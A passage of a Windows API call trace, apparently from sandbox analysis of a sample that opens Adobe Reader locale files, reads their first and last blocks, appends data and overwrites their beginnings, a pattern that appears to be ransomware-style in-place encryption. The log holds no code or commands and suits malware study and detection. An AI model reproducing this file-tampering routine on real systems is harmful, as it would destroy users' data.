SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.005] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1200 [0078.005] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.018] ReleaseMutex (hMutex=0x168) returned 1 [0078.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.HRV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.HRV", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflow.HRV", lpUsedDefaultChar=0x0) returned 10 [0078.018] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf2bc*=0x1200, lpOverlapped=0x0) returned 1 [0078.044] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0078.044] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1788, lpOverlapped=0x0) returned 1 [0078.044] CloseHandle (hObject=0x1e8) returned 1 [0078.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Weblink.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\weblink.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.051] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.051] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e00 [0078.051] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.051] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.051] ReleaseMutex (hMutex=0x168) returned 1 [0078.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.HRV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.HRV", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.HRV", lpUsedDefaultChar=0x0) returned 11 [0078.051] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.061] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0078.061] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.062] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0078.062] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.063] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0078.069] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.070] CloseHandle (hObject=0x1e8) returned 1 [0078.070] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\DVA.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\dva.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.070] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.071] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4a00 [0078.071] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.071] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.071] ReleaseMutex (hMutex=0x168) returned 1 [0078.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.HUN", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0078.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.HUN", cchWideChar=7, lpMultiByteStr=0x1f7abdc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.HUN", lpUsedDefaultChar=0x0) returned 7 [0078.071] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.078] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3a00 [0078.079] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.080] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3a00 [0078.080] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.081] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0078.081] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.081] CloseHandle (hObject=0x1e8) returned 1 [0078.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\RdLang32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\rdlang32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.092] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.092] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x151a00 [0078.093] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.093] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.093] ReleaseMutex (hMutex=0x168) returned 1 [0078.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.HUN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.HUN", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.HUN", lpUsedDefaultChar=0x0) returned 12 [0078.093] ReadFile (in: hFile=0x1dc, lpBuffer=0x2899e18, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2899e18*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0078.128] ReadFile (in: hFile=0x1dc, lpBuffer=0x2899e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2899e18*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.522] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x150a00 [0078.523] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.557] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x150a00 [0078.557] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.557] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0078.558] WriteFile (in: hFile=0x1dc, lpBuffer=0x289ae18*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289ae18*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0078.558] WriteFile (in: hFile=0x1dc, lpBuffer=0x289ae18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289ae18*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.558] CloseHandle (hObject=0x1dc) returned 1 [0078.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Spelling.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\spelling.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.888] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.888] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2a00 [0078.888] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.888] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.889] ReleaseMutex (hMutex=0x168) returned 1 [0078.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.HUN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.HUN", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.HUN", lpUsedDefaultChar=0x0) returned 12 [0078.889] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.924] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0078.924] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0078.986] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0078.986] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.987] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0078.987] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.987] CloseHandle (hObject=0x1dc) returned 1 [0078.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Checkers.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\checkers.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.988] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.988] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x20a00 [0078.988] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0078.988] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.988] ReleaseMutex (hMutex=0x168) returned 1 [0078.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.ITA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.ITA", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.ITA", lpUsedDefaultChar=0x0) returned 12 [0078.988] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0079.103] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1fa00 [0079.103] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0079.144] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1fa00 [0079.144] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.145] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0079.145] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0079.149] CloseHandle (hObject=0x1dc) returned 1 [0079.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\pddom.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\pddom.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0079.333] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0079.333] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2c00 [0079.333] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0079.333] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.333] ReleaseMutex (hMutex=0x168) returned 1 [0079.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.ITA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0079.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.ITA", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.ITA", lpUsedDefaultChar=0x0) returned 9 [0079.333] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0079.344] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0079.344] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0079.345] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0079.345] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.346] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0079.346] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.346] CloseHandle (hObject=0x1e4) returned 1 [0079.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0079.347] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0079.347] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8fdd [0079.347] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0079.347] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.347] ReleaseMutex (hMutex=0x168) returned 1 [0079.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.348] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0079.358] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7fdd [0079.358] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0079.735] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7fdd [0079.735] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, 